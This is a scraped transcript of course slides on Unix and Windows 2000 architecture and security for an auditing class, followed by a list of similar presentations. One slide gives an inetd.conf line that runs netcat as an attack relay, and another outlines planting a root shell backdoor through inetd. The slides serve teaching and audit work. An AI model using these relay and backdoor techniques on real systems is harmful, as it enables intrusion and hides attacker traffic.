Presentation is loading. Please wait.

Presentation is loading. Please wait.

Overview of Unix Jagdish S. Gangolly School of Business

Published byGeir Bjerke Modified over 6 years ago

Similar presentations

Presentation on theme: "Overview of Unix Jagdish S. Gangolly School of Business"— Presentation transcript:

1 Overview of Unix Jagdish S. Gangolly School of Business
State University of New York at Albany NOTE: These notes are based on the book Counter Hack, by Ed Skoudis and are prepared solely for the students in the course Acc 661 at SUNY Albany. They are not to be used by others without the permission of the instructor. 9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly

2 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly
Overview of Unix Architecture File System Structure Kernel and processes Account groups 9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly

3 Architecture: File System Structure
Hierarchical / Bin dev etc home lib mnt proc tmp usr var passwd group bin man sbin 9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly

4 Architecture: Kernel & Processes I
CPU can run at most one program at a time Kernel schedules processes, allocates and manages memory, and prevents one process from accessing memory belonging to other processes Daemons (background processes) perform print spooling, network services, file-sharing, web access, remote management capabilities, etc. 9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly

5 Architecture: Kernel & Processes II
Automatically starting processes: Init: parent of all user-level processes (/etc/init.d) Httpd (port 80), Sendmail (port 25), NFS Inetd (/etc/inetd.conf) Echo, Chargen, FTPd, Telnetd, Shell, login, TFTP Cron Vulnerability: Use of inetd.conf to create attack relays 11111 stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc [next_hop] 54321 9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly

6 Architecture: Kernel & Processes III
Vulnerability: Create a backdoor using Inetd Overflow a buffer in a program running with root level privileges Run a shell command to insert a line into the inetd.conf file (the line sets up a high order tcp port, running as root a command shell to execute any commands received) Killall command sends an HUP signal to Inetd process, making it reread the configuration file 9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly

7 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly
Accounts and Groups /etc/passwd Login name, encrypted/hashed password, UID number, default GID number, GECOS information, home directory, login shell Vulnerability: Password attacks Guessing, login scripts, L0phtCrack (win), John the Ripper /etc/group Unix permissions SetUID 9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly

8 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly
Miscellaneous Unix trust /etc/hosts.equiv .rhosts R-commands rlogin, rsh, rcp, … Vulnerable to IP-spoofing Logs and auditing /var/log/secure /var/log/messages /var/log/httpd, /var/log/cron,… 9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly

9 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly
Miscellaneous utmp – who wtmp – last lastlog – time of user’s last login 9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly

10 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly
Windows 2000 Domains: share authentication database Primary Domain Controller (PDC) Backup Domain Controller (BDC) SAM database Shares: remote connections to network devices Service packs and hotfixes 9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly

11 Windows 2000: Architecture
User Mode Kernel Mode Executive Subsystems Hardware Abstraction Layer Accounts and groups Default accounts (Administrator, Guest) Created by administrator Groups: Global and local 9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly

12 Windows 2000: Architecture II
Privileges: Administrators, users, guests Rights: things users can do that can be added or revoked Abilities: built-in capabilities of groups that can not be altered Policies: Account policy User properties settings Trust: No trust, Complete trust, Master domain, Multiple master domain 9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly

13 Windows 2000: Architecture III
Auditing System Logging Security Logging: logons/logoffs, files/object access, use of rights,… Application Logging Object access control and permissions Ownership NTFS permissions: No access, Read, Change, Full control Share permissions 9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly

14 Windows 2000: Architecture III
9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly

Download ppt "Overview of Unix Jagdish S. Gangolly School of Business"

Similar presentations

Communications of the ACM (CACM), Vol. 32, No. 6, June 1989

Communications of the ACM (CACM), Vol. 32, No. 6, June 1989
153 Configuring and Securing ARPA/Berkeley Services Version A.01 H3065S Module 13 Slides.

153 Configuring and Securing ARPA/Berkeley Services Version A.01 H3065S Module 13 Slides.
Unix Refresher This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited and added material. Dr. Stephen.

Unix Refresher This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited and added material. Dr. Stephen.
Unix permissions, ownership and setuid File security and ownership The chmod(1) command Process Ownership Setuid, Setgid and the Sticky bit Writing setuid.

Unix permissions, ownership and setuid File security and ownership The chmod(1) command Process Ownership Setuid, Setgid and the Sticky bit Writing setuid.
Chapter 21 Security. Computer Center, CS, NCTU 2 Firewall (1)  Using ipfw 1.Add these options in kernel configuration file and recompile the kernel 2.Edit.

Chapter 21 Security. Computer Center, CS, NCTU 2 Firewall (1)  Using ipfw 1.Add these options in kernel configuration file and recompile the kernel 2.Edit.
Exploring the UNIX File System and File Security

Exploring the UNIX File System and File Security
1 The Attack and Defense of Computers Dr. 許 富 皓. 2 Passwords in Unix/Linux Systems.

1 The Attack and Defense of Computers Dr. 許 富 皓. 2 Passwords in Unix/Linux Systems.
Linux and UNIX Overview 1 Linux and UNIX Overview.

Linux and UNIX Overview 1 Linux and UNIX Overview.
The UNIX File System.

The UNIX File System.
Understanding Networks I. Objectives Compare client and network operating systems Learn about local area network technologies, including Ethernet, Token.

Understanding Networks I. Objectives Compare client and network operating systems Learn about local area network technologies, including Ethernet, Token.
Information Networking Security and Assurance Lab National Chung Cheng University Investigating Unix System.

Information Networking Security and Assurance Lab National Chung Cheng University Investigating Unix System.
Linux+ Guide to Linux Certification, Second Edition

Linux+ Guide to Linux Certification, Second Edition
Chapter 3 Unix Overview. Figure 3.1 Unix file system.

Chapter 3 Unix Overview. Figure 3.1 Unix file system.
1. This presentation covers :  User Interface Administration  Files System and Services Management 2.

1. This presentation covers :  User Interface Administration  Files System and Services Management 2.
Chapter 4 Windows NT/2000 Overview. NT Concepts  Domains –A group of one or more NT machines that share an authentication database (SAM) –Single sign-on.

Chapter 4 Windows NT/2000 Overview. NT Concepts  Domains –A group of one or more NT machines that share an authentication database (SAM) –Single sign-on.
Windows This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited and added material. Dr. Stephen.

Windows This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited and added material. Dr. Stephen.
O.S security Ge Zhang Karlstad University. Outline Why O.S. security is important? Security schemes in Unix/Linux system Security schemes in windows system.

O.S security Ge Zhang Karlstad University. Outline Why O.S. security is important? Security schemes in Unix/Linux system Security schemes in windows system.
Overview: Identify the Internet protocols and standards Identify common vulnerabilities and countermeasures Identify specific IIS/WWW/FTP concerns Identify.

Overview: Identify the Internet protocols and standards Identify common vulnerabilities and countermeasures Identify specific IIS/WWW/FTP concerns Identify.
workshop eugene, oregon UNIX ™ /Linux Overview Unix/IP Preparation Course July 19, 2009 Eugene, Oregon, USA

workshop eugene, oregon UNIX ™ /Linux Overview Unix/IP Preparation Course July 19, 2009 Eugene, Oregon, USA
User Manager for Domains.  Manages the user accounts in a domain  It is located in the PDC  While User Manager exists in each NT machine, but it is.

User Manager for Domains.  Manages the user accounts in a domain  It is located in the PDC  While User Manager exists in each NT machine, but it is.

Similar presentations

Ads by Google